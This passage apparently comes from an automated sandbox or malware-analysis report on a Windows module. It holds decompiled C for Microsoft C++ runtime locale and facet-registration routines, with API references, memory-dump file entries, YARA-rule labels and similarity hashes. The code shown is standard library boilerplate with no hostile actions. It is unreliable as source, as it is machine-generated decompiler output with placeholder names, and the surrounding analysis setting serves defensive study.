																								_push(_t682 - 0x10);
																								__eflags = E6DDE12B4(_t482, _t527, _t633, _t641, _t657) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t682 - 0x20);
																									E6DDF3D74(_t682 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t482, _t641, _t657, 0x14);
																									E6DDD6653(_t682 - 0x14, 0);
																									_t658 =  *0x6de96dd8; // 0x0
																									 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																									 *(_t682 - 0x10) = _t658;
																									_t314 = E6DDB161C(0x6de96d84);
																									_t534 =  *((intOrPtr*)(_t682 + 8));
																									_t642 = E6DDB171B( *((intOrPtr*)(_t682 + 8)), _t314);
																									__eflags = _t642;
																									if(_t642 != 0) {
																										L54:
																										E6DDD66BA(_t682 - 0x14);
																										return E6DDF0075(_t642);
																									} else {
																										__eflags = _t658;
																										if(_t658 == 0) {
																											_push( *((intOrPtr*)(_t682 + 8)));
																											_push(_t682 - 0x10);
																											__eflags = E6DDE1339(_t482, _t534, _t633, _t642, _t658) - 0xffffffff;
																											if(__eflags == 0) {
																												E6DDB1438(_t682 - 0x20);
																												E6DDF3D74(_t682 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de383cf, _t482, _t642, _t658, 0x14);
																												E6DDD6653(_t682 - 0x14, 0);
																												_t659 =  *0x6de96db0; // 0x0
																												 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																												 *(_t682 - 0x10) = _t659;
																												_t327 = E6DDB161C(0x6de96d64);
																												_t541 =  *((intOrPtr*)(_t682 + 8));
																												_t643 = E6DDB171B( *((intOrPtr*)(_t682 + 8)), _t327);
																												__eflags = _t643;
																												if(_t643 != 0) {
																													L61:
																													E6DDD66BA(_t682 - 0x14);
																													return E6DDF0075(_t643);
																												} else {
																													__eflags = _t659;
																													if(_t659 == 0) {
																														_push( *((intOrPtr*)(_t682 + 8)));
																														_push(_t682 - 0x10);
																														__eflags = E6DDE13A1(_t482, _t541, _t633, _t643, _t659) - 0xffffffff;
																														if(__eflags == 0) {
																															E6DDB1438(_t682 - 0x20);
																															E6DDF3D74(_t682 - 0x20, 0x6de93504);
																															asm("int3");
																															E6DDF00AC(0x6de383cf, _t482, _t643, _t659, 0x14);
																															E6DDD6653(_t682 - 0x14, 0);
																															_t660 =  *0x6de96ddc; // 0x0
																															 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																															 *(_t682 - 0x10) = _t660;
																															_t340 = E6DDB161C(0x6de96d88);
																															_t548 =  *((intOrPtr*)(_t682 + 8));
																															_t644 = E6DDB171B( *((intOrPtr*)(_t682 + 8)), _t340);
																															__eflags = _t644;
																															if(_t644 != 0) {
																																L68:
																																E6DDD66BA(_t682 - 0x14);
																																return E6DDF0075(_t644);
																															} else {
																																__eflags = _t660;
																																if(_t660 == 0) {
																																	_push( *((intOrPtr*)(_t682 + 8)));
																																	_push(_t682 - 0x10);
																																	__eflags = E6DDE1409(_t482, _t548, _t633, _t644, _t660) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6DDB1438(_t682 - 0x20);
																																		E6DDF3D74(_t682 - 0x20, 0x6de93504);
																																		asm("int3");
																																		E6DDF00AC(0x6de383cf, _t482, _t644, _t660, 0x14);
																																		E6DDD6653(_t682 - 0x14, 0);
																																		_t661 =  *0x6de96de0; // 0x0
																																		 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																		 *(_t682 - 0x10) = _t661;
																																		_t353 = E6DDB161C(0x6de96d8c);
																																		_t555 =  *((intOrPtr*)(_t682 + 8));
																																		_t645 = E6DDB171B( *((intOrPtr*)(_t682 + 8)), _t353);
																																		__eflags = _t645;
																																		if(_t645 != 0) {
																																			L75:
																																			E6DDD66BA(_t682 - 0x14);
																																			return E6DDF0075(_t645);
																																		} else {
																																			__eflags = _t661;
																																			if(_t661 == 0) {
																																				_push( *((intOrPtr*)(_t682 + 8)));
																																				_push(_t682 - 0x10);
																																				__eflags = E6DDE1471(_t482, _t555, _t633, _t645, _t661) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6DDB1438(_t682 - 0x20);
																																					E6DDF3D74(_t682 - 0x20, 0x6de93504);
																																					asm("int3");
																																					E6DDF00AC(0x6de383cf, _t482, _t645, _t661, 0x14);
																																					E6DDD6653(_t682 - 0x14, 0);
																																					_t662 =  *0x6de96dfc; // 0x0
																																					 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																					 *(_t682 - 0x10) = _t662;
																																					_t366 = E6DDB161C(0x6de96da8);
																																					_t562 =  *((intOrPtr*)(_t682 + 8));
																																					_t646 = E6DDB171B( *((intOrPtr*)(_t682 + 8)), _t366);
																																					__eflags = _t646;
																																					if(_t646 != 0) {
																																						L82:
																																						E6DDD66BA(_t682 - 0x14);
																																						return E6DDF0075(_t646);
																																					} else {
																																						__eflags = _t662;
																																						if(_t662 == 0) {
																																							_push( *((intOrPtr*)(_t682 + 8)));
																																							_push(_t682 - 0x10);
																																							__eflags = E6DDE14EC(_t482, _t562, _t633, _t646, _t662) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6DDB1438(_t682 - 0x20);
																																								E6DDF3D74(_t682 - 0x20, 0x6de93504);
																																								asm("int3");
																																								E6DDF00AC(0x6de383cf, _t482, _t646, _t662, 0x14);
																																								E6DDD6653(_t682 - 0x14, 0);
																																								_t663 =  *0x6de96dcc; // 0x0
																																								 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																								 *(_t682 - 0x10) = _t663;
																																								_t379 = E6DDB161C(0x6de96d80);
																																								_t569 =  *((intOrPtr*)(_t682 + 8));
																																								_t647 = E6DDB171B( *((intOrPtr*)(_t682 + 8)), _t379);
																																								__eflags = _t647;
																																								if(_t647 != 0) {
																																									L89:
																																									E6DDD66BA(_t682 - 0x14);
																																									return E6DDF0075(_t647);
																																								} else {
																																									__eflags = _t663;
																																									if(_t663 == 0) {
																																										_push( *((intOrPtr*)(_t682 + 8)));
																																										_push(_t682 - 0x10);
																																										__eflags = E6DDE1558(_t482, _t569, _t633, _t647, _t663) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6DDB1438(_t682 - 0x20);
																																											E6DDF3D74(_t682 - 0x20, 0x6de93504);
																																											asm("int3");
																																											E6DDF00AC(0x6de383cf, _t482, _t647, _t663, 0x14);
																																											E6DDD6653(_t682 - 0x14, 0);
																																											_t664 =  *0x6de96e00; // 0x0
																																											 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																											 *(_t682 - 0x10) = _t664;
																																											_t392 = E6DDB161C(0x6de96dac);
																																											_t576 =  *((intOrPtr*)(_t682 + 8));
																																											_t648 = E6DDB171B( *((intOrPtr*)(_t682 + 8)), _t392);
																																											__eflags = _t648;
																																											if(_t648 != 0) {
																																												L96:
																																												E6DDD66BA(_t682 - 0x14);
																																												return E6DDF0075(_t648);
																																											} else {
																																												__eflags = _t664;
																																												if(_t664 == 0) {
																																													_push( *((intOrPtr*)(_t682 + 8)));
																																													_push(_t682 - 0x10);
																																													__eflags = E6DDE15C4(_t482, _t576, _t633, _t648, _t664) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6DDB1438(_t682 - 0x20);
																																														E6DDF3D74(_t682 - 0x20, 0x6de93504);
																																														asm("int3");
																																														E6DDF00AC(0x6de383cf, _t482, _t648, _t664, 0x14);
																																														E6DDD6653(_t682 - 0x14, 0);
																																														_t665 =  *0x6de96dd0; // 0x0
																																														 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																														 *(_t682 - 0x10) = _t665;
																																														_t405 = E6DDB161C(0x6de96d60);
																																														_t583 =  *((intOrPtr*)(_t682 + 8));
																																														_t649 = E6DDB171B( *((intOrPtr*)(_t682 + 8)), _t405);
																																														__eflags = _t649;
																																														if(_t649 != 0) {
																																															L103:
																																															E6DDD66BA(_t682 - 0x14);
																																															return E6DDF0075(_t649);
																																														} else {
																																															__eflags = _t665;
																																															if(_t665 == 0) {
																																																_push( *((intOrPtr*)(_t682 + 8)));
																																																_push(_t682 - 0x10);
																																																__eflags = E6DDE162A(_t482, _t583, _t633, _t649, _t665) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	_t587 = _t682 - 0x20;
																																																	E6DDB1438(_t587);
																																																	E6DDF3D74(_t682 - 0x20, 0x6de93504);
																																																	asm("int3");
																																																	E6DDF00AC(0x6de3851f, _t482, _t649, _t665, 4);
																																																	_t666 = _t587;
																																																	 *(_t682 - 0x10) = _t666;
																																																	 *((intOrPtr*)(_t666 + 4)) =  *((intOrPtr*)(_t682 + 0xc));
																																																	_push( *((intOrPtr*)(_t682 + 0x14)));
																																																	_t217 = _t682 - 4;
																																																	 *_t217 =  *(_t682 - 4) & 0x00000000;
																																																	__eflags =  *_t217;
																																																	 *_t666 = 0x6de3c0c4;
																																																	 *((char*)(_t666 + 0x28)) =  *((intOrPtr*)(_t682 + 0x10));
																																																	E6DDE542F(_t482, _t587, _t633, _t649, _t666,  *_t217);
																																																	return E6DDF0075(_t666,  *((intOrPtr*)(_t682 + 8)));
																																																} else {
																																																	_t649 =  *(_t682 - 0x10);
																																																	 *(_t682 - 0x10) = _t649;
																																																	 *(_t682 - 4) = 1;
																																																	E6DDD6FD3(__eflags, _t649);
																																																	 *0x6de3a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t649 + 4))))();
																																																	 *0x6de96dd0 = _t649;
																																																	goto L103;
																																																}
																																															} else {
																																																_t649 = _t665;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t648 =  *(_t682 - 0x10);
																																														 *(_t682 - 0x10) = _t648;
																																														 *(_t682 - 4) = 1;
																																														E6DDD6FD3(__eflags, _t648);
																																														 *0x6de3a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t648 + 4))))();
																																														 *0x6de96e00 = _t648;
																																														goto L96;
																																													}
																																												} else {
																																													_t648 = _t664;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t647 =  *(_t682 - 0x10);
																																											 *(_t682 - 0x10) = _t647;
																																											 *(_t682 - 4) = 1;
																																											E6DDD6FD3(__eflags, _t647);
																																											 *0x6de3a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t647 + 4))))();
																																											 *0x6de96dcc = _t647;
																																											goto L89;
																																										}
																																									} else {
																																										_t647 = _t663;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t646 =  *(_t682 - 0x10);
																																								 *(_t682 - 0x10) = _t646;
																																								 *(_t682 - 4) = 1;
																																								E6DDD6FD3(__eflags, _t646);
																																								 *0x6de3a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t646 + 4))))();
																																								 *0x6de96dfc = _t646;
																																								goto L82;
																																							}
																																						} else {
																																							_t646 = _t662;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t645 =  *(_t682 - 0x10);
																																					 *(_t682 - 0x10) = _t645;
																																					 *(_t682 - 4) = 1;
																																					E6DDD6FD3(__eflags, _t645);
																																					 *0x6de3a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t645 + 4))))();
																																					 *0x6de96de0 = _t645;
																																					goto L75;
																																				}
																																			} else {
																																				_t645 = _t661;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t644 =  *(_t682 - 0x10);
																																		 *(_t682 - 0x10) = _t644;
																																		 *(_t682 - 4) = 1;
																																		E6DDD6FD3(__eflags, _t644);
																																		 *0x6de3a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t644 + 4))))();
																																		 *0x6de96ddc = _t644;
																																		goto L68;
																																	}
																																} else {
																																	_t644 = _t660;
																																	goto L68;
																																}
																															}
																														} else {
																															_t643 =  *(_t682 - 0x10);
																															 *(_t682 - 0x10) = _t643;
																															 *(_t682 - 4) = 1;
																															E6DDD6FD3(__eflags, _t643);
																															 *0x6de3a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t643 + 4))))();
																															 *0x6de96db0 = _t643;
																															goto L61;
																														}
																													} else {
																														_t643 = _t659;
																														goto L61;
																													}
																												}
																											} else {
																												_t642 =  *(_t682 - 0x10);
																												 *(_t682 - 0x10) = _t642;
																												 *(_t682 - 4) = 1;
																												E6DDD6FD3(__eflags, _t642);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t642 + 4))))();
																												 *0x6de96dd8 = _t642;
																												goto L54;
																											}
																										} else {
																											_t642 = _t658;
																											goto L54;
																										}
																									}
																								} else {
																									_t641 =  *(_t682 - 0x10);
																									 *(_t682 - 0x10) = _t641;
																									 *(_t682 - 4) = 1;
																									E6DDD6FD3(__eflags, _t641);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t641 + 4))))();
																									 *0x6de96dc4 = _t641;
																									goto L47;
																								}
																							} else {
																								_t641 = _t657;
																								goto L47;
																							}
																						}
																					} else {
																						_t640 =  *(_t682 - 0x10);
																						 *(_t682 - 0x10) = _t640;
																						 *(_t682 - 4) = 1;
																						E6DDD6FD3(__eflags, _t640);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t640 + 4))))();
																						 *0x6de96dc8 = _t640;
																						goto L40;
																					}
																				} else {
																					_t640 = _t656;
																					goto L40;
																				}
																			}
																		} else {
																			_t639 =  *(_t682 - 0x10);
																			 *(_t682 - 0x10) = _t639;
																			 *(_t682 - 4) = 1;
																			E6DDD6FD3(__eflags, _t639);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t639 + 4))))();
																			 *0x6de96df4 = _t639;
																			goto L33;
																		}
																	} else {
																		_t639 = _t655;
																		goto L33;
																	}
																}
															} else {
																_t638 =  *(_t682 - 0x10);
																 *(_t682 - 0x10) = _t638;
																 *(_t682 - 4) = 1;
																E6DDD6FD3(__eflags, _t638);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t638 + 4))))();
																 *0x6de96df8 = _t638;
																goto L26;
															}
														} else {
															_t638 = _t654;
															goto L26;
														}
													}
												} else {
													_t637 =  *(_t682 - 0x10);
													 *(_t682 - 0x10) = _t637;
													 *(_t682 - 4) = 1;
													E6DDD6FD3(__eflags, _t637);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t637 + 4))))();
													 *0x6de96dc0 = _t637;
													goto L19;
												}
											} else {
												_t637 = _t653;
												goto L19;
											}
										}
									} else {
										_t636 =  *(_t682 - 0x10);
										 *(_t682 - 0x10) = _t636;
										 *(_t682 - 4) = 1;
										E6DDD6FD3(__eflags, _t636);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t636 + 4))))();
										 *0x6de96df0 = _t636;
										goto L12;
									}
								} else {
									_t636 = _t652;
									goto L12;
								}
							}
						} else {
							_t635 =  *(_t682 - 0x10);
							 *(_t682 - 0x10) = _t635;
							 *(_t682 - 4) = 1;
							E6DDD6FD3(__eflags, _t635);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t635 + 4))))();
							 *0x6de96dbc = _t635;
							goto L5;
						}
					} else {
						_t635 = _t651;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDF37C
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF386
int.LIBCPMT ref: 6DDDF39D

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDF3D7
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF3F7
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF415

Strings

pmm, xrefs: 6DDDF391

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: pmm
API String ID: 651022567-4180949709
Opcode ID: 3a45774437f5fa20eb3da4cf489ee2e3b4eed74ba69f1597f209f20cfb9b7e67
Instruction ID: d15b1a60124ce90231f174f78074abb6308cc34ab0dd48562c828c1df48afa91
Opcode Fuzzy Hash: 3a45774437f5fa20eb3da4cf489ee2e3b4eed74ba69f1597f209f20cfb9b7e67
Instruction Fuzzy Hash: 6A11A0B6808519DBCF01FBA4C840AFDB774AF44318F27400AF621AB291DF749A06CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD4A80, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6DDD4A80(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t57;
				intOrPtr* _t60;
				void* _t61;

				_t44 = __ebx;
				E6DDF00AC(0x6de38144, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t61 - 0x14, 0);
				 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
				_t57 =  *0x6deace80;
				 *((intOrPtr*)(_t61 - 0x10)) = _t57;
				_t23 = E6DDB161C(0x6de96b34);
				_t47 =  *((intOrPtr*)(_t61 + 8));
				_t24 = E6DDB171B( *((intOrPtr*)(_t61 + 8)), _t23);
				_t59 = _t24;
				if(_t24 != 0) {
					L5:
					E6DDD66BA(_t61 - 0x14);
					return E6DDF0075(_t59);
				} else {
					if(_t57 == 0) {
						_push( *((intOrPtr*)(_t61 + 8)));
						_push(_t61 - 0x10);
						__eflags = E6DDB18A0(__ebx, _t47, __edx, _t57, _t59) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t61 - 0x20);
							E6DDF3D74(_t61 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de38192, __ebx, _t57, _t59, 0xc);
							_t60 = E6DDD4A32(_t44, _t57, _t59, 8);
							 *((intOrPtr*)(_t61 - 0x18)) = _t61 - 0xd;
							 *((intOrPtr*)(_t61 - 0x14)) = _t60;
							__eflags = 0;
							 *(_t61 - 4) = 0;
							 *_t60 = 0;
							 *((intOrPtr*)(_t60 + 4)) = 0;
							 *_t60 = E6DDD5BFB();
							return E6DDF0075(_t60);
						} else {
							_t59 =  *((intOrPtr*)(_t61 - 0x10));
							 *((intOrPtr*)(_t61 - 0x10)) = _t59;
							 *(_t61 - 4) = 1;
							E6DDD6FD3(__eflags, _t59);
							 *((intOrPtr*)( *_t59 + 4))();
							 *0x6deace80 = _t59;
							goto L5;
						}
					} else {
						_t59 = _t57;
						goto L5;
					}
				}
			}

0x6ddd4a80
0x6ddd4a87
0x6ddd4a91
0x6ddd4a96
0x6ddd4a9f
0x6ddd4aa5
0x6ddd4aa8
0x6ddd4aad
0x6ddd4ab1
0x6ddd4ab6
0x6ddd4aba
0x6ddd4af5
0x6ddd4af8
0x6ddd4b04
0x6ddd4abc
0x6ddd4abe
0x6ddd4ac4
0x6ddd4aca
0x6ddd4ad2
0x6ddd4ad5
0x6ddd4b08
0x6ddd4b16
0x6ddd4b1b
0x6ddd4b23
0x6ddd4b2f
0x6ddd4b35
0x6ddd4b38
0x6ddd4b3b
0x6ddd4b3d
0x6ddd4b40
0x6ddd4b42
0x6ddd4b4a
0x6ddd4b53
0x6ddd4ad7
0x6ddd4ad7
0x6ddd4ada
0x6ddd4ade
0x6ddd4ae2
0x6ddd4aec
0x6ddd4aef
0x00000000
0x6ddd4aef
0x6ddd4ac0
0x6ddd4ac0
0x00000000
0x6ddd4ac0
0x6ddd4abe

APIs

__EH_prolog3.LIBCMT ref: 6DDD4A87
std::_Lockit::_Lockit.LIBCPMT ref: 6DDD4A91
int.LIBCPMT ref: 6DDD4AA8

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDD4AE2
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDD4AF8
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDD4B16

Strings

4km, xrefs: 6DDD4A9A

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: 4km
API String ID: 651022567-3804071703
Opcode ID: ebd6129c2c1997cb04a21ca0a842e8cb4eb06195d94f2665a1b9e2986bf7775a
Instruction ID: 481c63c3416ee030420c5208cba10d68e514b425c0fdeef0a988df0856473742
Opcode Fuzzy Hash: ebd6129c2c1997cb04a21ca0a842e8cb4eb06195d94f2665a1b9e2986bf7775a
Instruction Fuzzy Hash: A711CEB590822ADBCF00FBA4C840AFD7774AF18318F260508F611AB290EF709A05CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1E506, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E6DE1E506(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v56;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				signed int _v456;
				short _v458;
				intOrPtr _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v508;
				char _v536;
				signed int _v540;
				intOrPtr _v544;
				signed int _v556;
				char _v708;
				signed int _v712;
				signed int _v716;
				short _v718;
				signed int* _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int* _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v820;
				char _v1248;
				char _v1256;
				intOrPtr _v1276;
				signed int _v1292;
				signed int _t243;
				void* _t246;
				signed int _t249;
				signed int _t251;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t263;
				signed int _t265;
				void* _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t272;
				signed int _t275;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				intOrPtr _t285;
				signed int _t288;
				signed int _t292;
				signed int _t293;
				intOrPtr* _t295;
				intOrPtr _t296;
				signed int _t299;
				signed int _t300;
				signed int _t302;
				signed int _t322;
				signed int _t323;
				signed int _t326;
				signed int _t331;
				void* _t333;
				signed int _t335;
				void* _t336;
				intOrPtr _t337;
				signed int _t342;
				signed int _t343;
				intOrPtr* _t346;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				intOrPtr* _t365;
				signed int _t367;
				signed int _t373;
				intOrPtr* _t377;
				intOrPtr* _t380;
				void* _t383;
				signed int _t384;
				intOrPtr* _t385;
				signed int _t398;
				signed int _t401;
				intOrPtr* _t402;
				signed int _t404;
				signed int* _t408;
				intOrPtr* _t415;
				intOrPtr* _t416;
				intOrPtr _t425;
				signed int _t426;
				short _t427;
				signed int _t430;
				intOrPtr _t431;
				signed int _t434;
				intOrPtr _t435;
				signed int _t437;
				signed int _t440;
				intOrPtr _t446;
				signed int _t447;
				void* _t448;
				signed int _t449;
				signed int _t450;
				signed int _t453;
				signed int _t455;
				void* _t456;
				signed int _t459;
				signed int* _t460;
				intOrPtr* _t461;
				short _t462;
				void* _t464;
				signed int _t466;
				signed int _t468;
				void* _t470;
				void* _t471;
				void* _t473;
				signed int _t474;
				void* _t475;
				void* _t477;
				signed int _t478;
				void* _t480;
				void* _t482;
				intOrPtr _t494;

				_t425 = __edx;
				_t464 = _t470;
				_t471 = _t470 - 0xc;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t360 = E6DE1F26D(__ecx, 0x6a6);
				_t242 = 0;
				_pop(_t373);
				if(_t360 == 0) {
					L20:
					return _t242;
				} else {
					_push(__edi);
					_t2 = _t360 + 4; // 0x4
					_t430 = _t2;
					 *_t430 = 0;
					 *_t360 = 1;
					_t446 = _a4;
					_t4 = _t446 + 0x30; // 0x6de1da4e
					_t243 = _t4;
					_push( *_t243);
					_v16 = _t243;
					_push(0x6de40f34);
					_push( *0x6de40dec);
					E6DE1E445(_t360, _t373, _t430, _t446, _t430, 0x351, 3);
					_t473 = _t471 + 0x18;
					_v8 = 0x6de40dec;
					while(1) {
						L2:
						_t246 = E6DE2D470(_t430, 0x351, 0x6de40f30);
						_t474 = _t473 + 0xc;
						if(_t246 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t415 = _t8;
							_t342 =  *_v16;
							_v16 = _t415;
							_t416 =  *_t415;
							goto L4;
						}
						while(1) {
							L4:
							_t425 =  *_t342;
							if(_t425 !=  *_t416) {
								break;
							}
							if(_t425 == 0) {
								L8:
								_t343 = 0;
							} else {
								_t425 =  *((intOrPtr*)(_t342 + 2));
								if(_t425 !=  *((intOrPtr*)(_t416 + 2))) {
									break;
								} else {
									_t342 = _t342 + 4;
									_t416 = _t416 + 4;
									if(_t425 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							asm("sbb eax, eax");
							_t373 = _v8 + 0xc;
							_v8 = _t373;
							_v12 = _v12 &  !( ~_t343);
							_t346 = _v16;
							_v16 = _t346;
							_push( *_t346);
							_push(0x6de40f34);
							_push( *_t373);
							E6DE1E445(_t360, _t373, _t430, _t446, _t430, 0x351, 3);
							_t473 = _t474 + 0x18;
							if(_v8 < 0x6de40e1c) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E6DE1CBD3(_t360);
									_t31 = _t446 + 0x28; // 0x10468b00
									_t437 = _t430 | 0xffffffff;
									__eflags =  *_t31;
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											_t32 = _t446 + 0x28; // 0x10468b00
											E6DE1CBD3( *_t32);
										}
									}
									_t33 = _t446 + 0x24; // 0x3b8e8
									__eflags =  *_t33;
									if( *_t33 != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t437 == 1;
										if(_t437 == 1) {
											_t34 = _t446 + 0x24; // 0x3b8e8
											E6DE1CBD3( *_t34);
										}
									}
									 *(_t446 + 0x24) = 0;
									 *(_t446 + 0x1c) = 0;
									 *(_t446 + 0x28) = 0;
									 *((intOrPtr*)(_t446 + 0x20)) = 0;
									_t39 = _t446 + 0x40; // 0x18914c4
									_t242 =  *_t39;
								} else {
									_t20 = _t446 + 0x28; // 0x10468b00
									_t440 = _t430 | 0xffffffff;
									_t494 =  *_t20;
									if(_t494 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t494 == 0) {
											_t21 = _t446 + 0x28; // 0x10468b00
											E6DE1CBD3( *_t21);
										}
									}
									_t22 = _t446 + 0x24; // 0x3b8e8
									if( *_t22 != 0) {
										asm("lock xadd [eax], edi");
										if(_t440 == 1) {
											_t23 = _t446 + 0x24; // 0x3b8e8
											E6DE1CBD3( *_t23);
										}
									}
									 *(_t446 + 0x24) =  *(_t446 + 0x24) & 0x00000000;
									_t26 = _t360 + 4; // 0x4
									_t242 = _t26;
									 *(_t446 + 0x1c) =  *(_t446 + 0x1c) & 0x00000000;
									 *(_t446 + 0x28) = _t360;
									 *((intOrPtr*)(_t446 + 0x20)) = _t242;
								}
								goto L20;
							}
							goto L131;
						}
						asm("sbb eax, eax");
						_t343 = _t342 | 0x00000001;
						__eflags = _t343;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6DE12188();
					asm("int3");
					_push(_t464);
					_t466 = _t474;
					_t475 = _t474 - 0x1d0;
					_t249 =  *0x6de9506c; // 0xc4837075
					_v56 = _t249 ^ _t466;
					_t251 = _v40;
					_push(_t360);
					_push(_t446);
					_t447 = _v36;
					_push(_t430);
					_t431 = _v44;
					_v508 = _t431;
					__eflags = _t251;
					if(_t251 == 0) {
						_v456 = 1;
						_v468 = 0;
						_t362 = 0;
						_v452 = 0;
						__eflags = _t447;
						if(__eflags == 0) {
							L80:
							E6DE1E506(_t362, _t373, _t425, _t431, _t447, __eflags, _t431);
							goto L81;
						} else {
							__eflags =  *_t447 - 0x4c;
							if( *_t447 != 0x4c) {
								L59:
								_t257 = E6DE1DE92(_t362, _t425, _t431, _t447, _t447,  &_v276, 0x83,  &_v448, 0x55, 0);
								_t477 = _t475 + 0x18;
								__eflags = _t257;
								if(_t257 != 0) {
									_t373 = 0;
									__eflags = 0;
									_t76 = _t431 + 0x20; // 0x6de1da3e
									_t426 = _t76;
									_t449 = 0;
									_v452 = _t426;
									do {
										__eflags = _t449;
										if(_t449 == 0) {
											L74:
											_t258 = _v456;
										} else {
											_t377 =  *_t426;
											_t259 =  &_v276;
											while(1) {
												__eflags =  *_t259 -  *_t377;
												_t431 = _v464;
												if( *_t259 !=  *_t377) {
													break;
												}
												__eflags =  *_t259;
												if( *_t259 == 0) {
													L67:
													_t373 = 0;
													_t260 = 0;
												} else {
													_t427 =  *((intOrPtr*)(_t259 + 2));
													__eflags = _t427 -  *((intOrPtr*)(_t377 + 2));
